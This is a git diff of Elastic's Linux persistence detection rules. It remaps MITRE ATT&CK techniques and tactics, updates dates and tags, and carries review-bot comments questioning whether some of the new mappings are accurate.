"2024/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -84,18 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -125,42 +114,11 @@ file.extension == null and process.executable != null and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml index 3c79ca6de78..b1d7c9ec078 100644 --- a/rules/linux/persistence_git_hook_netcon.toml +++ b/rules/linux/persistence_git_hook_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -85,16 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=3s @@ -119,19 +110,14 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -154,7 +140,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
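Review bot: The second hunk maps the git-hook network connection to T1071 Application Layer Protocol, which asserts a specific protocol layer that an outbound-connection sequence (`sequence by host.id with maxspan=3s`) does not by itself establish; the Defense Evasion block this commit removes shows the tactic-only form (`[[rule.threat]]` with just `[rule.threat.tactic]`), so a tactic-only TA0011 entry, or a sentence in the rule explaining the T1071 choice, would be safer than a technique the query cannot evidence. The first hunk reorders the tag list so `Tactic: Command and Control` precedes `Tactic: Execution` and `Tactic: Persistence`, matching the new block order and the other files in this commit. The query body is outside the hunk, so the protocol question may already be answered there.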
diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml index 2203dc37a30..eaaeea7afa9 100644 --- a/rules/linux/persistence_git_hook_process_execution.toml +++ b/rules/linux/persistence_git_hook_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,19 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -127,24 +115,6 @@ not process.name in ("git", "dirname") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -163,7 +133,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml index d3c5b78af10..0e3eb428f97 100644 --- a/rules/linux/persistence_grub_configuration_creation.toml +++ b/rules/linux/persistence_grub_configuration_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,18 +76,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -129,16 +118,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml index dc757627521..7bdd557c7ce 100644 --- a/rules/linux/persistence_grub_makeconfig.toml +++ b/rules/linux/persistence_grub_makeconfig.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -119,16 +119,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml index b4d7276cf08..1285bab4907 100644 --- a/rules/linux/persistence_init_d_file_creation.toml +++ b/rules/linux/persistence_init_d_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -192,6 +192,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml index b0fd18bbca5..92ea71412a6 100644 --- a/rules/linux/persistence_insmod_kernel_module_load.toml +++ b/rules/linux/persistence_insmod_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -192,6 +192,19 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -206,16 +219,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 58550c3b588..9edc27b511d 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/06" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -243,6 +243,11 @@ id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml index 0f7b646be9e..a705e1909cf 100644 --- a/rules/linux/persistence_kernel_driver_load.toml 
+++ b/rules/linux/persistence_kernel_driver_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,31 +96,31 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.006" name = "Kernel Modules and Extensions" reference = "https://attack.mitre.org/techniques/T1547/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml index 9f4a8303937..264a2ebba28 100644 --- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml +++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
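Review bot: The `@@ -96,31 +96,31 @@` hunk only reorders the two threat entries so Defense Evasion (T1014) now precedes Persistence (T1547.006), with no change to the mappings themselves, and the same move is made in the other kernel-module rules in this commit. If anything downstream treats the first `[[rule.threat]]` entry as the rule's primary tactic (the `persistence_` file prefix suggests these were authored Persistence-first), the reorder silently changes it; if it is purely cosmetic, a line in the PR description saying so would save the next reader the question. A one-line comment is not possible in the threat table, so the description is the right place for the rationale.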
@@ -101,6 +101,19 @@ auditd.data.syscall in ("init_module", "finit_module") and user.id != "0" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -115,16 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml index 6a383383172..474b8cef8fd 100644 --- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml +++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,6 +118,19 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" 
@@ -132,16 +145,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml index e5b8aede59e..eed8a4ed3c7 100644 --- a/rules/linux/persistence_kernel_object_file_creation.toml +++ b/rules/linux/persistence_kernel_object_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -129,15 +121,19 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml index 59a33614ada..60a4a084698 100644 --- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml +++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,16 +121,6 @@ id = "T1543.005" name = "Container Service" reference = "https://attack.mitre.org/techniques/T1543/005/" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.007" -name = "Container Orchestration Job" -reference = "https://attack.mitre.org/techniques/T1053/007/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" 
diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml index 428a388aa15..5fb2a701f22 100644 --- a/rules/linux/persistence_kworker_file_creation.toml +++ b/rules/linux/persistence_kworker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -152,17 +152,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -182,22 +172,14 @@ process.name : "kworker*" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml index fde1a2aa627..42c38c10005 100644 --- a/rules/linux/persistence_linux_backdoor_user_creation.toml +++ b/rules/linux/persistence_linux_backdoor_user_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
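Review bot: The new mapping, `T1036.004 Masquerade Task or Service` under Defense Evasion, fits a process named `kworker*` creating files, but the hunk also drops Rootkit (T1014) and every Persistence mapping while the file keeps its `persistence_kworker_file_creation` name and the tags hunk above drops `"Tactic: Persistence"`. If the file-name prefix is meant to track the rule's primary tactic (convention not visible here), it should become `defense_evasion_…`, or a Persistence entry should be retained. Kernel-thread impersonation is also a common rootkit tell, so removing T1014 is a judgement call that deserves a sentence in the PR description.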
@@ -122,18 +122,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -147,16 +136,24 @@ process.args in ("-o", "--non-unique") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" - -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml index 1a5ec523679..f7dfdc918b0 100644 
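Review bot: Replacing `T1136.001 Local Account` with `T1098 Account Manipulation` in the Persistence entry loses the mapping that matches half of the query: `useradd -o/--non-unique` (the `process.args in ("-o", "--non-unique")` context) creates a new account that shares an existing UID, which is account creation, whereas Account Manipulation covers changes to an existing account (the `usermod` path, if the process list outside the hunk includes it). Keep both in the Persistence entry, e.g. re-add `[[rule.threat.technique]]` / `id = "T1136"` with its `T1136.001` sub-technique next to T1098. The new Privilege Escalation entry for T1098 is appropriate for the duplicate-UID (typically UID 0) case.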
--- a/rules/linux/persistence_linux_group_creation.toml +++ b/rules/linux/persistence_linux_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["system"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -103,13 +103,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -120,16 +114,34 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml index e3267bc31b1..a496f455970 100644 --- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml +++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
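Review bot: `T1098.007 Additional Local or Domain Groups` describes adding an account to a group, but this query fires on group creation (`event.type == "group"` with a creation type in the hunk context), where no account gains membership or privilege. Creating a group by itself escalates nothing, so the added TA0004 `[[rule.threat]]` block and the `"Tactic: Privilege Escalation"` tag overstate what the rule observes; the sibling rule for users added to privileged groups, changed in the same commit, is where T1098.007 fits. Consider keeping a single Persistence entry here and dropping the Privilege Escalation block and tag, unless the query also matches membership changes outside the hunk.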
@@ -179,6 +179,19 @@ process where host.os.type == "linux" and event.type == "start" and process.pare [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -193,16 +206,3 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml index 10ff2785c87..001f3e1a015 100644 --- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml +++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
